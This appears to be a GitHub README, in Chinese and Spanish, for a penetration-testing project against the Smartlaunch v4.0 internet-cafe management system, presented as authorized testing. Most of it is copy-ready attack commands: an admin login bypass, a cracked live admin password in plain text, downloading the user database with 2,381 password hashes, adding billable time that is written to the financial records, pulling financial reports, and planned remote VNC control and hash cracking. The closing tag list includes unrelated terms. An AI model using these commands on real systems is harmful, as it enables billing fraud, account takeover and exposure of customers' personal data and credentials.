Desstter/ciberpentest
GitHub: Desstter/ciberpentest
针对 Smartlaunch 网吧管理系统的完整渗透测试研究项目,涵盖协议逆向、源码反编译、漏洞挖掘与利用验证的全流程文档和工具集。
Stars: 0 | Forks: 0
# Smartlaunch v4.0 — 安全研究
## IA 快速导航
| 我想要... | 阅读 |
|-----------|------|
| 快速回顾 — 有什么,缺什么 | `PROGRESS.md` 的“当前状态”部分 |
| 操纵数据库(增加时间、积分) | `ATTACK_PLAYBOOK.md` 攻击 11-13 |
| 使用代码执行任何攻击 | `ATTACK_PLAYBOOK.md` |
| 理解 TCP 协议 | `PROTOCOL.md` |
| 查看所有漏洞 | `FINDINGS.md` |
| 数据库向量 — 技术分析 | `FINDINGS.md` 第 9 节 |
| 源代码分析 | `analysis_output/decompile_findings.md` |
## 当前状态 — 29/03/2026
```
ACCESO ADMIN TOTAL: AdminID=2{end} + Logon=Admin^zoro123{end}
CREDENCIALES: Admin : zoro123 (hash DB crackeado, activo)
Admin : admin (hash Client.inf, password antiguo)
DB DESCARGADA: smartlaunch1_backup.mdb — 2,381 usuarios, 11,815 transacciones
SERVER DESCARGADO: Server.exe (4.4 MB) — decompilado con ilspycmd
MANIPULACION DB CONFIRMADA EN VIVO (Sesion 8):
UserAddTime=test^60^0^1 -> SetUserTimePrice=test^1079^61,18^63,60^True
MONTO=60 son PESOS, no minutos. Servidor calcula minutos segun tarifa vigente.
SI deja log financiero permanente (INSERT FinancialTransactions en DB).
Reporte financiero: GetTransactionList=46110^46111^0^0^True (OADate!)
```
## 已确认的漏洞
| ID | 严重性 | 描述 | 状态 |
|----|-----------|-------------|--------|
| VUL-1 | 严重 | `AdminID=2-50` 在无凭据的情况下被接受 | 已确认 |
| VUL-2 | 严重 | 明文 TCP 没有 TLS — 一切均可被拦截 | 已确认 |
| VUL-3 | 高危 | `UserLoginApproved` 泄露了用户的 SHA-1 哈希 | 已确认 |
| VUL-4 | 高危 | 用户枚举无速率限制 | 已确认 |
| VUL-5 | 高危 | 无盐 SHA-1 — Admin:zoro123 (活跃) 已被破解 | 已破解 |
| VUL-6 | 中危 | FileTransfer 无需员工身份验证 — Server.exe 可被下载 | 已确认 |
| VUL-7 | 中危 | `UpdateLog` 向任何 AdminID 广播 | 已确认 |
| VUL-8 | 严重 | 数据库备份可通过 FileTransfer 下载 — 1.19 GB,包含哈希 | 已确认 |
## 今天可用的功能(即拿即用的命令)
```
# 完整认证 (2 步)
AdminID=2{end} -> ConnectionApproved
Logon=Admin^zoro123{end} -> (silencio = exito)
# 如果 AccessDenied=3:使用 ForceLogon=Admin^zoro123{end}
# 实时活动用户
OpenUserAccounts{end} -> SetUserTimePrice=USER^MINS^COSTO^HISTORICO^ACTIVO
# PC 状态
GetComputerState{end} -> SetComputerState=...
# 活跃收银员
GetCurrentCashier{end} -> SetCurrentCashier=Admin^ID,TOKEN
# *** 现场确认 — 添加持久化到 DB 的实时数据 ***
UserAddTime=test^60^0^1{end}
# -> SetUserTimePrice=test^1079^61,18^63,60^True
# 金额=60 为哥伦比亚比索 (非分钟)。服务器根据费率计算分钟数。
# PAYTYPE: 0=现金 | LOGFLAG: 1=记录到财务日志
# 延长活动会话 (仅 RAM — 不会持久化到 DB)
UserContinueSession=moonhellal^60{end} -> RemoveUserLogoutList=moonhellal^60
# 当日财务报告 — 重要:使用 OADate (整数),而非日期字符串
# 29/03/2026 = 46110 | 计算:[DateTime]::new(2026,3,29).ToOADate()
GetTransactionList=46110^46111^0^0^True{end}
# -> RetrieveReport=Transaction History Report (03-29-2026).rpt^False
# 然后下载:FileTransfer=2^-1^2^Temporary\^Transaction History Report (03-29-2026).rpt{end}
# 下载 DB 备份 (3 步 — 见 ATTACK_PLAYBOOK.md 攻击 2)
FileTransfer=2^-1^2^db\backup\^smartlaunch1.mdb{end}
```
## 仓库结构
```
README.md <- este archivo — indice y estado actual
PROTOCOL.md <- spec completa del protocolo TCP puerto 7831
FINDINGS.md <- hallazgos detallados, vectores confirmados y descartados
ATTACK_PLAYBOOK.md <- ataques paso a paso con codigo PowerShell listo para ejecutar
PROGRESS.md <- log cronologico de sesiones
analysis_output/
decompile_findings.md <- analisis profundo del codigo fuente (ilspycmd)
dll_reflection.md <- tipos y enums de Communication.dll
server_strings.md <- strings extraidos de Server.exe
Server_src/ <- ~150 archivos C# decompilados de Server.exe
Communication_src/ <- C# decompilado de Communication.dll
downloads/
Server.exe <- 4,665,344 bytes
smartlaunch updater.exe <- 126,976 bytes
smartlaunch1_backup.mdb <- DB backup (1.19 GB) — 2,381 usuarios + hashes
tx_report_hoy.rpt <- Reporte financiero 29/03/2026 (14,848 bytes, Crystal Reports OLE)
Client.inf <- config de PC025 (IP, puerto, hash empleado, restricciones)
phase5_user_access.ps1 <- simulacion completa de acceso admin
check_moonhellal.ps1 <- verificacion rapida de estado de usuario
test_useradd_time.ps1 <- prueba UserAddTime en usuario "test" con verificacion de logs
```
## 优先待办事项
```
PRIORIDAD MAXIMA — Manipulacion de DB:
1. [CONFIRMADO con "test"] UserAddTime=moonhellal^60^0^1{end}
-> INSERT FinancialTransactions — agrega tiempo real que persiste en DB
-> MONTO=60 pesos -> ~1019 minutos a tarifa vigente
-> Ver ATTACK_PLAYBOOK.md Ataque 11
2. ExternalAuthorization=Admin^zoro123{end} -> Authorized{end}
Luego:
Luego:
-> Escribe a DB via modulo WebInterface — Ver ATTACK_PLAYBOOK.md Ataque 12
3. UserOpenAccount=moonhellal^120^1{end}
-> Abre sesion real con balance real — Ver ATTACK_PLAYBOOK.md Ataque 13
ALTA PRIORIDAD:
4. GetClientScreenshot=1 -> screenshot en tiempo real de PC activo
5. StartVNCServer=1 -> control remoto VNC
6. hashcat -m 100 hashes_usuarios.txt rockyou.txt -> 2,381 hashes SHA-1
7. GetExportLogData{end} -> logs del servidor
8. GetCashReport=46082^46111^0^0^True -> reporte financiero mes de marzo
```
## 工具
- **PowerShell** — 侦察和利用脚本(根目录)
- **ilspycmd 9.1** — 对 Server.exe 和 Communication.dll 进行 .NET 反编译
- **OleDB/Jet 4.0** — 读取下载的 .mdb 文件
- **hashcat** — 破解无盐 SHA-1
*授权的安全测试 — E-Sports Colombia*
标签:AI合规, CVE, HTTP工具, ILSpy, IT安全, Maven, SHA1破解, Smartlaunch, TCP协议分析, 云资产清单, 代码反编译, 凭据破解, 多人体追踪, 数字签名, 数据展示, 数据库操纵, 数据泄露, 无线安全, 明文传输, 未授权访问, 漏洞分析, 漏洞验证, 红队, 网吧管理软件, 网络安全, 路径探测, 逆向工程, 防御绕过, 隐私保护